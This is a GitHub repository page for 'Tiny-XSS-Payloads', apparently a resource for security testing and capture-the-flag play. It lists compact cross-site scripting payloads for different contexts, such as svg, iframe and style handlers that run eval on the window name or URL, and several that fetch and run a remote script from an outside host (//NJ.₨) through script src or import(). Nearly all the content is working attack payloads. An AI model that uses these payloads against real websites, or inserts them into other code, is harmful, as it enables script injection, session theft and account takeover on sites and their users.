Skip to content

terjanq/Tiny-XSS-Payloads

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

@terjanq
terjanq Update README.md
5e86039 Oct 15, 2021
Update README.md
5e86039

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
CNAME
 
 
README.md
 
 
dom-xss.js
 
 
index.html
 
 
intro.png
 
 
main.js
 
 
payloads.js
 
 
style.css
 
 
Tiny-XSS-Payloads Current Payloads

README.md

Tiny-XSS-Payloads

A collection of short XSS payloads that can be used in different contexts.

The DEMO available here: https://tinyxss.terjanq.me

Current Payloads

<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script -->
<script/src=//NJ.₨></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)>
<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\NJ.₨/)>

Deprecated:

<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>

About

A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me

tinyxss.terjanq.me/

Topics

javascript html xss ctf bugbounty payloads

Resources

Readme

Stars

1.7k stars

Watchers

47 watching

Forks

163 forks
Report repository

Contributors 3

  •  
  •  
  •  

Languages